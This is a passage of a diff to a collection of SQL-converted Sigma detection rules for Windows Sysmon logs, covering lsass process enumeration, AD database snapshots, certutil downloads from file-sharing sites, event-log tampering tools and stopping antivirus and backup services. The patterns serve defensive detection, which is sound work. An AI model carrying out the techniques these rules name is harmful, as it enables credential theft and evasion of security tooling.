"proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local 
copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine 
LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or 
script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' 
ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE 
